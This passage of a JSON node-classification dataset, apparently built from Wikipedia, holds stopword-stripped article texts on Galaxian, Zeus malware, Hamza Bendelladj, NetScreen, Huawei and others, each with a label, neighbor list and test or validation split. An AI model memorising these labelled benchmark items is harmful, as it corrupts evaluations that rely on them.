fire game attract mode featured short plotline titled galaxians mission destroy aliens rounds indicated small flags bottom screen galaxian designed kazunori sawano previously worked many namco electro-mechanical shooting gallery arcade games notably shoot away 1977 early game development taito released space invaders japan swept country storm helped turn video game industry highly-profitable business help capitalize game success namco president masaya nakamura ordered sawano make best post-invaders game could put vast amount pressure development team although development game lasted six months sawano made several ideas half year production began sawano team set make game anybody could play using simple best motto production — helped trim away large-scale ideas favor game could loop endlessly able use two enemy types alongside space invaders large portion game inspired star wars specifically large-scale space battles sawano wanted replicate feeling space war specifically game sound effects several back-and-forth sound effects made many rejected sawano matching vision game namco first arcade game composed synthesizer game balance important part game sawano want make game suddenly spike difficulty build-up warning development team made number enemies on-screen gradually increased difficulty player progresses becoming noticeable later stages enemies designed personality programmed monitor player movements make attacks based early development sawano envisioned enemies resemble tie fighters star wars save hardware memory processing programmers created tilemap hardware model created set 8x8 pixel tiles — reduced processing memory requirements upwards 64 times compared framebuffer model used space invaders galaxian released namco japan november 1979 following large success namco approached midway games terms releasing game overseas midway previously lost license taito success space invaders west midst trying find new partner releasing games agreed deal released game north america early 1980 — move helped strengthen midway challenged atari leadership market help keep demand game japan namco would license game companies manufacturing cabinets including taito irem galaxian critical commercial success upon release 1982 sold 40,000 arcade units north america japan would outperform pac-man short critics applauded game use true color graphics improving formula established space invaders april 5 1980 issue cashbox noted game colorful attractive cabinet design april 26 issue called earthshaking hit referring true followup space invaders video magazine 1982 reviewed astrocade version galaxian named galactic invasion noting graphics inferior coin-op pc versions praising play-action magnificent compared console versions astrocade version would later awarded certificate merit best arcade-to-home video game translation 4th annual arkie awards 2007 retrospective review sir clive eurogamer labeled masterpiece praising beautifully drawn game graphics intense gameplay historically important game industry home computing weekly 1983 gave spectrum version galaxian 3/5 stars describing well-written version praising graphics fast although flickery softline 1983 criticized atari 8-bit version game shipped rom cartridge raised cost stated game becomes tedious quickly atari inc. published ports galaxian systems—atari 8-bit family atari 2600 atari 5200— 1982-3 three years galaxian appeared arcades year galaga additional ports published atarisoft label apple ii colecovision commodore 64 vic-20 ibm pc zx spectrum ports companies sold msx europe japan nec pc-8801 famicom japan sharp x1 bally astrocade version published galaxian name later changed galactic invasion coleco released stand-alone mini-arcade tabletop version galaxian 1981 along pac-man donkey kong frogger sold three million units combined entex released handheld electronic game called galaxian 2 1981 game called galaxian 2 two-player mode sequel entex galaxian galaxian would spawn long series sequels spin-offs multiple game platforms including arcade hardware home video game systems first galaga released year later 1981 usurping original popularity cited one greatest video games time becoming popular game golden age arcade video games north america followed gaplus 1984 added power-up items juggling-based bonus stages galaga '88 released 1987 published north america atari games featured branching level paths new enemy types multiple endings 1990 namco produced theme-park attraction based series originally presented expo '90 moved namco wonder eggs theme park two years later rail shooter 28 players used lightguns shoot enemies projectiles smaller version arcades released 1992 followed 1996 playstation release japan europe 1995 arcade remake galaga released namco classic collection vol 1 compilation galaga arrangement game added two-player co-operative play boss fights alongside new enemy weapon types ported xbox playstation 2 gamecube 2002 part compilation disk namco museum japan-only medal game spin-off galaxian fever released 2000 part namco shooting medal series following year hasbro interactive released playstation game boy color adding side-scrolling third-person stages core gameplay 2005 playstation portable compilation namco museum battle collection includes remake galaga titled galaga arrangement relation one featured namco classic collection vol 1 game later ported ios devices 2009 renamed galaga remix 2008 namco bandai games released downloadable game xbox 360 playstation 3 galaga legions — game instead twin-stick shooter game score attack modes multiple stages followed 2011 sequel galaga legions dx branded now-defunct namco generations label galaxian included namco museum series collections across several platforms galaxian galaga bundled together game boy release arcade classic 3 galaxian released microsoft windows 1995 part microsoft return arcade game also released part pac-man arcade party 30th anniversary arcade machine game also seen jakks pacific plug play tv game controllers galaxian along galaga gaplus galaga '88 redesigned modernized iphone app compilation called galaga 30th anniversary collection released commemoration event namco bandai super impulse also released stand-alone tiny arcade version galaxian galaxian world record focus many competitive gamers since release famous galaxian rivalry british player gary whelan american perry rodgers faced apollo amusements pompano beach florida usa 6–9 april 2006 whelan held world record 1,114,550 points beaten newcomer aart van vliet netherlands scored 1,653,270 points 27 may 2009 funspot family fun center weirs beach new hampshire usa",
    "neighbors": [
      11522,
      3075,
      9093,
      6797,
      10644,
      1060,
      9516,
      9006,
      10544,
      10931,
      6452,
      8010,
      10316,
      10576,
      5717,
      8663,
      3039,
      226,
      8937,
      2540,
      8942,
      1776,
      4856,
      5753
    ],
    "mask": "Test"
  },
  {
    "node_id": 10288,
    "label": 3,
    "text": "PRIMEHPC_FX10:primehpc fx10 primehpc fx10 supercomputer designed manufactured fujitsu announced 7 november 2011 supercomputing conference primehpc fx10 improved commercialized version k computer first supercomputer obtain 10 pflops linpack benchmark largest configuration primehpc fx10 peak performance 23.2 pflops power consumption 22.4 mw list price us 655.4 million succeeded primehpc fx100 sparc64 xifx processors 2015 first installation primehpc fx10 university tokyo information technology center named oakleaf-fx system peak performance 1.135 pflops consists 4,800 nodes total 76,800 cores 150 tb memory 50 racks oakleaf-fx ordered november 2011 became operational april 2012 june 2012 ranked 18th fastest supercomputer 39th top500 list fastest supercomputers linpack benchmark performance 1.043 pflops june 2012 fujitsu received order republic china central weather bureau first primehpc fx10 sale outside japan system installed 2014 performance 1 pflops addition serving platform high-performance computing primehpc fx10 also intended serve software development platform k computer compatible fujitsu sold several systems k computer software development including 96-node system june 2012 kobe university graduate school informatics 384-node system august 2012 university tokyo institute solid-state physics",
    "neighbors": [
      10021,
      3431,
      1480,
      823,
      4270,
      9137,
      1399,
      2394,
      1503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10289,
    "label": 2,
    "text": "IBM_Common_User_Access:ibm common user access common user access cua standard user interfaces operating systems computer programs developed ibm first published 1987 part systems application architecture used originally mvs/esa vm/cms os/400 os/2 microsoft windows operating systems parts cua standard implemented programs operating systems including variants unix also used java awt swing ibm wanted standard way interact text-based user interface software whether screen dumb terminal connected mainframe ps/2 vga graphics cua detailed specification set strict rules applications look function aim part bring harmony among dos applications independently implemented different user interfaces examples thus every program learned individually complete user interface memorised sign expertise learned uis dozens applications since novice user facing new program would find existing knowledge similar application either use actively hindrance understanding learned behavior might need unlearned new application detailed cua specification published december 1987 328 pages long similarities apple computer detailed human interface guidelines 139 pages apple hig detailed book specifying software 1984 apple macintosh computer look function first written mac new graphical user interface gui software novelty apple took great pains ensure programs would conform single shared look feel cua similar aim faced difficult task trying impose retroactively existing thriving chaotic industry much ambitious goal unifying ui personal computers minicomputers mainframes supporting character gui modes batch interactive designs comparison apple hig supported interactive gui standalone personal computer cua also attempted measurable standard apple hig large sections formatted checklists measure compliance cua contains standards operation elements dialog boxes menus keyboard shortcuts become influential implemented today many programmers never read cua standards seen operation windows dos-based applications like ms-dos 5 full-screen text editor edit.com cua hallmarks include cua covers dos applications also basis windows consistent user interface standard cui well os/2 applications — text-mode presentation manager gui — ibm mainframes conform systems application architecture cua attempt rationalise dos applications — part larger scheme bring together rationalise harmonise overall functions software hardware across ibm entire computing range microcomputers mainframes perhaps partly completely successful third edition cua took radical departure first two introducing object-oriented workplace changed emphasis user interactions data documents pictures user worked emphasis applications removed intention making computer easier use matching users expectations would work documents using programs rather operating programs work documents see also object-oriented user interface cua strongly influenced early microsoft windows operating system period joint ibm microsoft cooperation os/2 presentation manager later releases ibm cua documents used microsoft products cua became less significant windows environment instance start menu introduced standard keystrokes basic gui widgets specified cua remain available windows cua never significant impact design unix terminal character-mode applications preceded cua decade however major unix gui environments/toolkits whether based x window system featured varying levels cua compatibility motif/cde explicitly featuring design goal current major environments gnome kde also feature extensive cua compatibility subset cua implemented microsoft windows osf/motif generally considered de facto standard followed new unix gui environment",
    "neighbors": [
      3970,
      6147,
      10280,
      4137,
      11562,
      6797,
      7983,
      5492,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 10290,
    "label": 4,
    "text": "Department_of_Defense_Cyber_Crime_Center:department defense cyber crime center department defense cyber crime center dc3 designated federal cyber center national security presidential directive 54/homeland security presidential directive 23 department defense dod center excellence digital multimedia d/mm forensics dod directive 5505.13e serves operational focal point defense industrial base dib cybersecurity information assurance cs/ia program dc3 operates air force office special investigations afosi osi deliver superior d/mm forensic services cyber technical training vulnerability sharing technical solutions development cyber analysis following dod mission areas cybersecurity cs critical infrastructure protection cip law enforcement counterintelligence le/ci document media exploitation domex counterterrorism ct dc3 cyber forensics laboratory dc3/cfl performs d/mm forensic examinations device repair data extraction expert testimony dod lab robust intrusion malware analysis capability supports dc3 lines business activities lab operations accredited iso 17025 american society crime laboratory directors/laboratory accreditation board ascld/lab guides reliable repeatable valid exam results subjected quality control peer review dc3 cyber training academy formerly dcita defense cyber investigations training academy provides in-residence online training dod elements protect dod information systems unauthorized use criminal fraudulent foreign intelligence activities academy curriculum offers courses organized specialty areas since founding 1998 academy recorded 35,000 student enrollments courses dc3 technical solutions development dc3/tsd directorate tailors software system solutions engineered specific requirements digital forensic examiners cyber intrusion analysts tsd validates commercial off-the-shelf cots government off-the-shelf gots in-house developed software/hardware used forensic process addition tsd functions dod repository cyber counterintelligence ci tools operational hub dib cs/ia program dib collaborative information sharing environment dc3/dcise assists dib companies safeguard dod content intellectual property residing transiting unclassified networks dcise develops shares actionable threat products performs cyber analysis diagnostics remediation consults dib partners dc3 analytical group dc3/ag supports le/ci agencies including air force office special investigations afosi naval criminal investigative services ncis key mission partners federal bureau investigation fbi member agency national cyber investigative joint task force ncijtf ag leads collaborative analytical technical exchange subject matter experts le/ci computer network defense cnd intelligence community ic information assurance ia agencies build threat picture enabling proactive le/ci cyber operations focuses nation-state threat actors 2006 2013 dc3 held free online international competition consisting individual progressive-level exercises challenges tests included stenography data carving data recovery detection malicious software first year 140 teams u.s. participated challenge final year challenge grown include 1,254 teams 53 countries dc3 hosted dod cyber crime conference 2003 2012 military criminal investigative organizations federal law enforcement",
    "neighbors": [
      2437,
      7449,
      7968,
      5284,
      7979,
      11182,
      10545,
      4789,
      8635,
      830,
      2494,
      6475,
      4049,
      4435,
      11221,
      3544,
      5473,
      4834,
      5475,
      2148,
      7525,
      1639,
      9319,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10291,
    "label": 4,
    "text": "NetScreen_Technologies:netscreen technologies netscreen technologies american technology company acquired juniper networks us 4 billion stock stock 2004 netscreen technologies developed asic-based internet security systems appliances delivered high performance firewall vpn traffic shaping functionality internet data centers e-business sites broadband service providers application service providers netscreen first firewall manufacturer develop gigabit-speed firewall netscreen-1000 netscreen technologies founded yan ke ken xie feng deng ken xie chief technology officer co-founder also ceo robert thomas joined 1998 robert thomas netscreen president chief executive officer came netscreen 1998 sun microsystems general manager intercontinental operations sun software business includes security networking internet tools ken xie left netscreen 2000 found fortinet competing asic-based firewall company netscreen acquired core ips technology purchase onesecure inc. us 45 million stock 2002 onesecure created rakesh loonkar subsequently co-founder trusteer israeli engineer nir zuk one check point software ’ first employees 2003 netscreen hired anson chen vice president research development anson chen 12-year veteran cisco systems inc. former vice president general manager network management services technology group led engineering research development efforts netscreen entire product line including firewall ipsec virtual private network vpn intrusion detection prevention technologies chen also functional management responsibility netscreen secure access products yan ke feng deng stayed juniper acquisition left company 2005 start northern light venture capital china concept venture capital firm focused early growth stage opportunities tmt consumer clean technologies life science industries nir zuk stayed juniper acquisition left 2005 start palo alto networks analysis firmware code 2015 showed backdoor key could exist using dual_ec_drbg would enable whoever held key passively decrypt traffic encrypted screenos december 2015 juniper systems announced discovered unauthorized code screenos software underlies netscreen devices present 2012 onwards two vulnerabilities one simple root password backdoor one changing point dual_ec_drbg attackers presumably key use preexisting intentional unintentional kleptographic backdoor screenos passively decrypt traffic",
    "neighbors": [
      10210,
      9927,
      6985,
      939,
      10574,
      6481,
      5172,
      11577,
      8668,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10292,
    "label": 1,
    "text": "DBM_(computing):dbm computing computing dbm library file format providing fast single-keyed access data original dbm library file format simple database engine originally written ken thompson released 1979 name three letter acronym database manager also refer family database engines apis features derived original dbm dbm library stores arbitrary data use single key primary key fixed-size buckets uses hashing techniques enable fast retrieval data key hashing scheme used form extendible hashing hashing scheme expands new buckets added database meaning nearly empty database starts one bucket split becomes full two resulting child buckets split become full database grows keys added dbm library derivatives pre-relational databases manage associative arrays implemented on-disk hash tables practice offer practical solution high-speed storage accessed key require overhead connecting preparing queries balanced fact generally opened writing single process time agent daemon handle requests multiple processes introduces ipc overhead original dbm library replaced many successor implementations notable examples include 2001 ndbm implementation dbm standard solaris irix whereas berkeley db implementations standard free operating systems",
    "neighbors": [
      5120,
      3427,
      10628,
      8582,
      9286,
      8393,
      10921,
      11017,
      10732,
      7728,
      2804,
      2966,
      4598,
      5560,
      1594,
      2045,
      9151
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10293,
    "label": 2,
    "text": "Blob_emoji:blob emoji google blob emoji feature android mobile operating system 2013 2017 google introduced blobs part android kitkat mobile operating system 2013 next year google expanded blob style include emojis normally depict humans example instead flamenco dancer apple emoji style derivates google blob style showed less glamorous blob rose teeth 2016 google redesigned blobs gumdrop-shape unicode group establishes emoji standards introduced skin tone gender options emojis google emojis progressively appeared humans less yellow amorphous blobs google retired blobs 2017 release android oreo favor circular emojis similar style platforms consistent cross-platform emoji interpretation among redesign primary aims redesign development year mimicked apple effort include detail emoji glyph offer yellow skin tone default since 2017 effort maintain blob emojis google retired called blobmoji available github blob emoji divisive feature 2013 2017 proponents praised novel interpretation emoji ideograms detractors criticized miscommunication results emoji interpreted differently across platforms google released sticker packs featuring blob emoji gboard android messages 2018",
    "neighbors": [
      1427,
      5100,
      2259
    ],
    "mask": "Test"
  },
  {
    "node_id": 10294,
    "label": 7,
    "text": "SciDB:scidb scidb column-oriented database management system dbms designed multidimensional data management analytics common scientific geospatial financial industrial applications developed paradigm4 co-created turing award winner michael stonebraker stonebraker claims arrays 100 times faster scidb relational dbms class problems swapping rows columns mathematical arrays put fewer restrictions data work number dimensions unlike conventionally widely used relational database management system model relation supports one dimension records according 2011 conference presentation scidb supports marilyn matz became chief executive company",
    "neighbors": [
      7868,
      10326,
      7767
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10295,
    "label": 4,
    "text": "Hamza_Bendelladj:hamza bendelladj hamza bendelladj arabic حمزة بن دلاج algerian hacker goes code name bx1 nicknamed smiling hacker born 1988 tizi ouzou algeria top 10 list wanted hackers interpol fbi allegedly embezzling tens millions dollars two hundred american european financial institutions via computer virus rimig33k infected 50 million computers worldwide mostly united states developed russian accomplice aleksandr andreevich panin aka gribodemon steal banking information stored infected computers hacked official website israeli government using malicious software called spyeye bendelladj pseudonyms bx1 daniel hb broke computers banks private individuals acquire passwords identification codes took control account emptied three-year hunt bendelladj arrested january 8 2013 thai police making stopover bangkok transit malaysia egypt resist arrest said goodbye family arrested wife daughter continued journey egypt without earned nickname smiling hacker due smile face media presentation photos taken arrest even handcuffed according thai police bendelladj top 10 wanted fbi asked money claimed donated millions dollars palestinian charities trial documents mention extradited may 2013 united states tried atlanta pleaded guilty june 25 2015 faced sentence 30 years prison fine fourteen million dollars accomplice aleksandr andreevich panin arrested july 1 2013 atlanta hartsfield-jackson international airport pleaded guilty january 2014 atlanta federal court 2015 tunisian website posted rumor bendelladj sentenced death rumor spread social networks algeria several facebook support groups created reaction support petition launched demanding algerian ministry foreign affairs president barack obama intervene release us ambassador algeria joan a. polaschik wrote twitter account computer crimes capital crimes punishable death penalty bendelladj prison united states since may 2013 us court sentenced april 20 2016 15 years prison 3 years probation russian accomplice panin 27 aka gribodemon sentenced 9 years 6 months prison report united states department justice estimated spyeye virus stolen approximately billion dollars 2010 2012 affected banks repaired damage caused malware bendelladj lawyer announced intended appeal court decision",
    "neighbors": [
      10297,
      7515,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 10296,
    "label": 9,
    "text": "Action_Code_Script:action code script action code script acs scripting language used video games modern doom source ports zdoom syntactically similar c less flexible name implies core logic script functionality comes form scripts traditionally identified numerical value later revisions acs compiler added support named scripts utilize string lieu numerical identifier simple functions similar traditional code acs compiled using acc homage c gcc utility use doom hexen etc ... scripts executed variety methods attached in-game actors execution level triggers around map invocation scripts functions entire scripting language built hack top doom id tech engine formal support object-oriented programming principles using classic hello world example basic example text hello world printed upon entering level syntax follows",
    "neighbors": [
      9034,
      9780,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10297,
    "label": 4,
    "text": "Zeus_(malware):zeus malware zeus zeus zbot trojan horse malware package runs versions microsoft windows used carry many malicious criminal tasks often used steal banking information man-in-the-browser keystroke logging form grabbing also used install cryptolocker ransomware zeus spread mainly drive-by downloads phishing schemes first identified july 2007 used steal information united states department transportation became widespread march 2009 june 2009 security company prevx discovered zeus compromised 74,000 ftp accounts websites companies bank america nasa monster.com abc oracle play.com cisco amazon businessweek similarly koobface zeus also used trick victims technical support scams giving scam artists money pop-up messages claim user virus reality might viruses scammers may use programs command prompt event viewer make user believe computer infected zeus difficult detect even up-to-date antivirus security software hides using stealth techniques considered primary reason zeus malware become largest botnet internet damballa estimated malware infected 3.6 million pcs u.s. 2009 security experts advising businesses continue offer training users teach click hostile suspicious links emails web sites keep antivirus protection date antivirus software claim reliably prevent infection example symantec browser protection says prevent infection attempts october 2010 us fbi announced hackers eastern europe managed infect computers around world using zeus virus distributed e-mail targeted individuals businesses municipalities opened e-mail trojan software installed victimized computer secretly capturing passwords account numbers data used log online banking accounts hackers used information take victims ’ bank accounts make unauthorized transfers thousands dollars time often routing funds accounts controlled network money mules paid commission many u.s. money mules recruited overseas created bank accounts using fake documents false names money accounts mules would either wire back bosses eastern europe withdraw cash smuggle country 100 people arrested charges conspiracy commit bank fraud money laundering 90 us others uk ukraine members ring stolen 70 million 2013 hamza bendelladj known bx1 online arrested thailand deported atlanta georgia usa early reports said mastermind behind zeus accused operating spyeye bot functionally similar zeus botnets suspected also operating zeus botnets charged several counts wire fraud computer fraud abuse court papers allege 2009 2011 bendelladj others developed marketed sold various versions spyeye virus component parts internet allowed cybercriminals customize purchases include tailor-made methods obtaining victims ’ personal financial information also alleged bendelladj advertised spyeye internet forums devoted cyber- crimes operated command control servers charges georgia relate spyeye spyeye botnet control server based atlanta late 2010 number internet security vendors including mcafee internet identity claimed creator zeus said retiring given source code rights sell zeus biggest competitor creator spyeye trojan however experts warned retirement ruse expect developer return new tricks",
    "neighbors": [
      3072,
      10756,
      10245,
      5131,
      9233,
      535,
      4648,
      9256,
      46,
      10295,
      10297,
      3643,
      7739,
      9791,
      1088,
      2114,
      4165,
      81,
      8789,
      2147,
      10340,
      107,
      3704,
      10875,
      5245,
      2175,
      6786,
      3724,
      6797,
      9356,
      10392,
      1690,
      5281,
      2213,
      6834,
      184,
      704,
      7364,
      10952,
      10457,
      3807,
      1254,
      10477,
      4344,
      3320,
      5886,
      4863,
      1279,
      3852,
      3856,
      8978,
      3347,
      4883,
      2325,
      278,
      3867,
      8998,
      2857,
      7990,
      1337,
      7996,
      11583,
      3395,
      7515,
      8032,
      9569,
      1892,
      3941,
      877,
      4462,
      8045,
      6520,
      9087,
      7044,
      901,
      10141,
      9630,
      11168,
      10657,
      423,
      939,
      1970,
      1979,
      6588,
      9664,
      9154,
      8133,
      2508,
      988,
      5087,
      3555,
      2041,
      3581
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10298,
    "label": 4,
    "text": "Lorcon:lorcon lorcon acronym loss radio connectivity open source network tool library injecting 802.11 wlan frames capable injecting via multiple driver frameworks without need change application code lorcon built patching third-party codice_1-driver cards based qualcomm atheros wireless chipset project maintained joshua wright michael kershaw dragorn",
    "neighbors": [
      11221,
      5492,
      1429
    ],
    "mask": "Test"
  },
  {
    "node_id": 10299,
    "label": 4,
    "text": "Orange_box:orange box orange box piece hardware software generates caller id frequency-shift keying fsk signals spoof caller id information target caller id terminal",
    "neighbors": [
      2920,
      11170,
      8950
    ],
    "mask": "None"
  },
  {
    "node_id": 10300,
    "label": 4,
    "text": "Anti-pharming:anti-pharming anti-pharming techniques technology used combat pharming traditional methods combating pharming include server-side software dns protection web browser add-ins toolbars server-side software typically used enterprises protect customers employees use internal private web-based systems pharmed phished browser add-ins allow individual users protect phishing dns protection mechanisms help ensure specific dns server hacked thereby become facilitator pharming attacks spam filters typically provide users protection pharming currently efficient way prevent pharming end users make sure using secure web connections https access privacy sensitive sites banking taxing accept valid public key certificates issued trusted sources certificate unknown organisation expired certificate accepted time crucial business so-called active cookies provide server-side detection tool legislation also plays essential role anti-pharming march 2005 u.s senator patrick leahy d-vt introduced anti-phishing act 2005 bill proposes five-year prison sentence and/or fine individuals execute phishing attacks use information garnered online fraud phishing pharming commit crimes identity theft home users consumer-grade routers wireless access points perhaps single effective defense change password router something default replacing password susceptible dictionary attack",
    "neighbors": [
      10915,
      7557,
      2887,
      9744,
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 10301,
    "label": 3,
    "text": "Integration_Objects:integration objects integration objects software development firm created 2002 company systems integrator solutions provider knowledge management automation plant process management decision support applications develops opc software products knowledge management platforms manufacturers primarily oil gas refining petrochemicals chemical food beverage steel pharmaceutical industries also provides consulting services integration objects member opc foundation international society automation mimosa also collaborated partnered companies invensys osisoft gensym abb large projects clients include exxonmobil saudi aramco solvay chemicals opc technology follows set open standards specifications created managed opc foundation ensure interoperability devices systems industrial automation within enterprise systems origins opc based microsoft ole com dcom technology today opc set standards allow field systems devices automation control applications business applications communicate acquired real-time historical data records enterprise systems production devices multiple vendors standards evolving created rewritten account emerging technologies trends manufacturing companies invest large amounts money industrial automation infrastructures many yet realize full value investment many remain islands automation information silos disconnected systems including business systems enormous amounts data may available companies often lack proper infrastructure would allow adequately share data use improve process efficiency profitability integration process control plant-level enterprise systems longer option manufacturing energy companies want remain competitive convergence world automation process controls greatly helps effort providing economically technically competitive solutions however sharing process information within networks must done way aligns overall security policies enterprise system integrators must find customized solutions fit specific company needs goals many enterprises across various industries face issue important resources data information knowledge embedded computer systems documentation minds individuals across organization accessing extremely difficult time-consuming however using intelligent computer platforms capture integrate knowledge analyze organize store well users monitor manage operations performances effectively make safe smart decisions rapidly improve results knowledge management allows organization benefit collective knowledge written resources employees experiences know-how applications knowledge management systems found many fields example case abnormal plant conditions knowledge management platforms allow operator identify root cause problem correct action taken automatically reviewing stored analyzed data found system knowledge management strategic asset necessary organization remain competitive",
    "neighbors": [
      2948,
      8581
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10302,
    "label": 4,
    "text": "RecoverPoint:recoverpoint recoverpoint continuous data protection product offered dell emc supports asynchronous synchronous data replication block-based storage recoverpoint originally created company called kashya bought emc 2006 kashya founded february 2001 originally located ramat gan israel venture funding included battery ventures jerusalem global ventures 2003 additional operations san jose california announced along 12 million funding first product kashya acquired emc corporation may 9 2006 153 million emc already announced product named recoverpoint october 2005 adapted product called recovery one mendocino software kashya product named kdx 5000 emc recoverpoint product based kashya technology released 2007 version 3.0 released 2008 recoverpoint continuous data protection cdp tracks changes data block level journals changes every write tracked stored different snapshot alternatively groups writes aggregated according configuration order reduce storage space network traffic journal allows rolling data previous point-in-time order view drive contents certain data corruption cdp journal write individually hence enabling any-point-in-time snapshots configured combine consecutive writes order reduce journal space improve bandwidth cdp works storage area network recoverpoint appliances need configured replica journal logical unit numbers luns recoverpoint continuous remote replication crr enables replica remote site setup recoverpoint appliances clusters required local remote sites 2 clusters communicate either fibre channel fc internet protocol recoverpoint applies data compression data de-duplication order reduce wide area network traffic recoverpoint 3.4 one remote site crr combined cdp order provide concurrent local remote clr replication consistency group cg term used grouping several luns together order ensure write-order consistency several volumes used example database stores data journal different logical drives logical drives must kept in-sync replica data-consistency needs preserved examples multi-volume file systems zfs windows dynamic disks similar continuous data protection products unlike backup products recoverpoint needs obtain copy every write order track data changes emc advertises recoverpoint heterogenous due support multi-vendor server network storage arrays host-based write splitting done using device driver installed server accessing storage volumes usage host-based splitter allows replication selected non-emc storage available fabric-based splitters brocade communications systems san switches cisco systems santap requires investment additional switch blades configuration allows splitting operating systems regardless version agnostic storage array vendor storage array splitters supported subset emc storage products method allows write splitting operating systems require special san switching hardware recoverpoint/se slimmed-down version supports type splitter site requires installation cluster composed 2-8 recoverpoint appliances multiple appliances work together high availability cluster appliance connected via fc san must access server scsi initiator storage scsi target appliance must also connected ip network management replication takes place either fc standard internet protocol one splitters would split traffic storage appliances besides integration emc products appsync vipr replication manager control center unisphere clariion vnx symmetrix vplex storage arrays recoverpoint integrates following products integration vmware vsphere vmware site recovery manager microsoft hyper-v allows protection specified per virtual machine instead per volumes available hypervisor integration microsoft shadow copy exchange sql server oracle database server allows recoverpoint temporarily stop writes host order take consistent application-specific snapshots application programming interfaces command-line interfaces allow customers integrate custom internal software",
    "neighbors": [
      5472,
      11233,
      9218,
      2051,
      6852,
      10340,
      3366,
      1990,
      10951,
      6153,
      2154,
      6834,
      6003,
      11030,
      9655,
      1049,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 10303,
    "label": 3,
    "text": "Huawei:huawei huawei technologies co. ltd. chinese multinational technology company provides telecommunications equipment sells consumer electronics including smartphones headquartered shenzhen guangdong province company founded 1987 ren zhengfei initially focused manufacturing phone switches huawei expanded business include building telecommunications networks providing operational consulting services equipment enterprises inside outside china manufacturing communications devices consumer market huawei 188,000 employees around 76,000 engaged research development r 21 r institutes around world april 2019 opened dedicated ox horn campus dongguan company invested us 13.8 billion r huawei deployed products services 170 countries served 45 50 largest telecom operators networks numbering 1,500 reach one third world population huawei overtook ericsson 2012 largest telecommunications-equipment manufacturer world overtook apple 2018 second-largest manufacturer smartphones world behind samsung electronics ranks 72nd fortune global 500 list december 2018 huawei reported annual revenue risen us 108.5 billion 2018 21 increase 2017 although successful internationally huawei faced difficulties markets due cybersecurity allegations—primarily united states government—that huawei infrastructure equipment may enable surveillance chinese government especially development 5g wireless networks china aggressively promoted calls u.s. prevent use products huawei fellow chinese telecom zte u.s. allies huawei argued products posed greater cybersecurity risk vendor evidence u.s. espionage claims nonetheless huawei pulled u.s. consumer market 2018 concerns affected ability market consumer products u.s. measures intensified may 2019 midst ongoing trade war china united states huawei restricted commerce u.s. companies due alleged previous willful violations u.s. sanctions iran 29 june 2019 u.s. president donald trump reached agreement resume trade talks china announced would ease aforementioned sanctions huawei name huawei literally translates china hua shortened form huaxia poetic name china wei means make chinese pinyin huáwéi pronounced mandarin chinese cantonese name transliterated jyutping waa-wai pronounced however pronunciation huawei non-chinese varies countries example hoe-ah-wei netherlands company considered changing name english concerned non-chinese may find name hard pronounce decided keep name launched name recognition campaign instead encourage pronunciation closer wah-way using words wow way 1980s chinese government tried modernize country underdeveloped telecommunications infrastructure core component telecommunications network telephone exchange switches late 1980s several chinese research groups endeavored acquire develop technology usually joint ventures foreign companies ren zhengfei former deputy director people liberation army engineering corps founded huawei 1987 shenzhen company reports rmb 21,000 registered capital time founding ren sought reverse engineer foreign technologies local researchers time china telecommunications technology imported abroad ren hoped build domestic chinese telecommunication company could compete ultimately replace foreign competitors first several years company business model consisted mainly reselling private branch exchange pbx switches imported hong kong meanwhile reverse-engineering imported switches investing heavily research development manufacture technologies 1990 company approximately 600 r staff began independent commercialization pbx switches targeting hotels small enterprises company first major breakthrough came 1993 launched c c08 program controlled telephone switch far powerful switch available china time initially deploying small cities rural areas placing emphasis service customizability company gained market share made way mainstream market huawei also key contract build first national telecommunications network people liberation army deal one employee described small terms overall business large terms relationships 1994 founder ren zhengfei meeting party general secretary jiang zemin telling switching equipment technology related national security nation switching equipment like one lacked military jiang reportedly agreed assessment 1990s canadian telecom giant nortel outsourced production entire product line huawei subsequently outsourced much product engineering huawei well another major turning point company came 1996 government beijing adopted explicit policy supporting domestic telecommunications manufacturers restricting access foreign competitors huawei promoted government military national champion established new research development offices 1997 huawei contract provide fixed-line network products hong kong company hutchison whampoa later year huawei launched wireless gsm-based products eventually expanded offer cdma umts 1999 company opened research development r center bangalore india develop wide range telecom software may 2003 huawei partnered 3com joint venture known h3c focused enterprise networking equipment marked 3com re-entrance high-end core routers switch market abandoned 2000 focus businesses 3com bought huawei share venture 2006 us 882 million 2005 huawei foreign contract orders exceeded domestic sales first time huawei signed global framework agreement vodafone agreement marked first time telecommunications equipment supplier china received approved supplier status vodafone global supply chain huawei also signed contract british telecom bt deployment multi-service access network msan transmission equipment bt 21st century network 21cn 2007 huawei began joint venture u.s. security software vendor symantec corporation known huawei symantec aimed provide end-to-end solutions network data storage security huawei bought symantec share venture 2012 new york times noting symantec fears partnership would prevent obtaining united states government classified information cyberthreats may 2008 australian carrier optus announced would establish technology research facility huawei sydney october 2008 huawei reached agreement contribute new gsm-based hspa+ network deployed jointly canadian carriers bell mobility telus mobility joined nokia siemens networks huawei delivered one world first lte/epc commercial networks teliasonera oslo norway 2009 july 2010 huawei included global fortune 500 2010 list published u.s. magazine fortune first time strength annual sales us 21.8 billion net profit us 2.67 billion october 2012 announced huawei would move uk headquarters green park reading berkshire september 2017 huawei created narrowband iot city-aware network using one network one platform n applications construction model utilising iot cloud computing big data next-generation information communications technology also aims one world five largest cloud players near future april 2019 huawei established huawei malaysia global training centre mgtc cyberjaya malaysia huawei ’ first training centre outside china end 2018 huawei sold 200 million smartphones reported strong consumer demand premium range smart phones helped company reach consumer sales excess 52 billion 2018 huawei announced worldwide revenues 105.1 billion 2018 net profit 8.7 billion huawei q1 2019 revenues 39 year-over-year us 26.76 billion huawei centre espionage allegations chinese 5g network equipment 2018 united states passed defense funding bill contained passage barring federal government business huawei zte several chinese vendors surveillance products due security concerns 1 december 2018 huawei vice-chairwoman cfo meng wanzhou daughter company founder ren zhengfei arrested canada request u.s. authorities faced extradition united states charges violating sanctions iran 22 august 2018 arrest warrant issued u.s. district court eastern district new york meng charged conspiracy defraud multiple international institutions according prosecutor warrant based allegations conspiracy defraud banks clearing money claimed huawei actually skycom entity claimed entirely 